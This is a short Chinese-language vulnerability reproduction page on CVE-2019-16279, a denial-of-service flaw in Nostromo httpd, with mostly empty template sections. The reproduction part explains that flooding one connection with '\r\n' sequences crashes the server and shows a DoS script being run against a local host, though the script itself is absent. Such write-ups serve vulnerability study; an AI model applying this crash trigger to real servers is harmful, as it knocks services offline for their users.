# (CVE-2019-16279)Nostromo httpd dos
=====================
一、漏洞简介
————
(CVE-2019-16279)dos
二、影响范围
————
三、复现过程
————
This bug exploit a memory error when sending too many `\r\n` in a single
connexion.
Example
$ curl http://127.0.0.1:8080
HELLO!
$ ./CVE-2019-16279.sh 127.0.0.1 8080
$ curl http://127.0.0.1:8080
curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容